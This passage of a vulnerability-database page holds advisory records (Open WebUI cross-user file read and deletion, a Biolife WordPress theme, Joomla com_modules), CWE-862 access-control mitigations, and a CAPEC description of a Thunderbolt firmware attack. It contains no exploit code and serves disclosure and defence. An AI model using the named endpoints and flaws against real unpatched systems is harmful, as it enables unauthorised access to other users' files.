advisory and CVE:\n\n- Cross-user file READ via a forged `chat_file` association (`GET /api/v1/files/{id}/content`): @0xEr3n. Fixed by #25054, which gates `Chats.insert_chat_files()` so a caller can only link files they own or can read.\n- Cross-user file DELETION via the shared-chat branch ignoring `access_type` (`DELETE /api/v1/files/{id}`): reported independently by @oxsignal (earliest filing; reached via a legitimately read-only-shared chat, no forged association needed), by @0xEr3n (via the forged association), and by @5yu4n. Fixed by #24755, which makes the shared-chat branch honour `access_type`.\n\nAffected: `\u003c= 0.9.5`. Patched: `\u003e= 0.9.6`. One CVE for the consolidated advisory.",
"id": "GHSA-vrhc-3fr6-pc3c",
"modified": "2026-06-17T14:12:20Z",
"published": "2026-06-17T14:12:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-vrhc-3fr6-pc3c"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/pull/24755"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/pull/25054"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI: Forged chat-file link allows cross-user file read and deletion"
}
GHSA-VRJ8-G8CM-3MJV
Vulnerability from github – Published: 2026-04-08 09:31 – Updated: 2026-04-13 21:30Missing Authorization vulnerability in kutethemes Biolife biolife allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Biolife: from n/a through <= 3.2.3.
{
"affected": [],
"aliases": [
"CVE-2026-39624"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-08T09:16:32Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in kutethemes Biolife biolife allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Biolife: from n/a through \u003c= 3.2.3.",
"id": "GHSA-vrj8-g8cm-3mjv",
"modified": "2026-04-13T21:30:35Z",
"published": "2026-04-08T09:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39624"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Theme/biolife/vulnerability/wordpress-biolife-theme-3-2-3-arbitrary-shortcode-execution-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VRJW-8HW2-RWM5
Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2022-05-24 17:38An issue was discovered in Joomla! 3.0.0 through 3.9.23. The lack of ACL checks in the orderPosition endpoint of com_modules leak names of unpublished and/or inaccessible modules.
{
"affected": [],
"aliases": [
"CVE-2021-23123"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-12T21:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Joomla! 3.0.0 through 3.9.23. The lack of ACL checks in the orderPosition endpoint of com_modules leak names of unpublished and/or inaccessible modules.",
"id": "GHSA-vrjw-8hw2-rwm5",
"modified": "2022-05-24T17:38:55Z",
"published": "2022-05-24T17:38:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23123"
},
{
"type": "WEB",
"url": "https://developer.joomla.org/security-centre/836-20210101-core-com-modules-exposes-module-names.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.